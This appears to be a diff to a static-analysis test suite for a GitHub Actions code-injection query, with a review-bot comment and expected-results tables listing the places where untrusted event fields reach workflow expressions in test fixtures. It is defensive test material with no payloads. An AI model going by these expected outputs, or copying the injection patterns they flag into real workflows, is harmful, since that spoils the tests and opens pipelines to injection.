.github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run |
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
index 6fc87669b07f..9af8ec0f9ab1 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
@@ -1,2 +1 @@
-query: Security/CWE-094/CodeInjectionCritical.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-094/CodeInjectionCritical.ql
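Review bot: Dropping `postprocess: utils/test/InlineExpectationsTestQuery.ql` from CodeInjectionCritical.qlref leaves the `.expected` table as the only oracle for the CodeInjectionCritical query, so any inline alert annotations in the test workflows would no longer be checked against the query results. If this is a deliberate revert of the actions tests within the series, the commit message should say so; otherwise keep the two-line form, `query: Security/CWE-094/CodeInjectionCritical.ql` followed by `postprocess: utils/test/InlineExpectationsTestQuery.ql`. Whether the workflow fixtures still carry such annotations is not visible from this hunk and should be confirmed before merging.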
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
index fc6f8aa58209..4bbe7da0aaf3 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
+++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
@@ -1,62 +1,3 @@ -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
@@ -756,3 +697,62 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. 
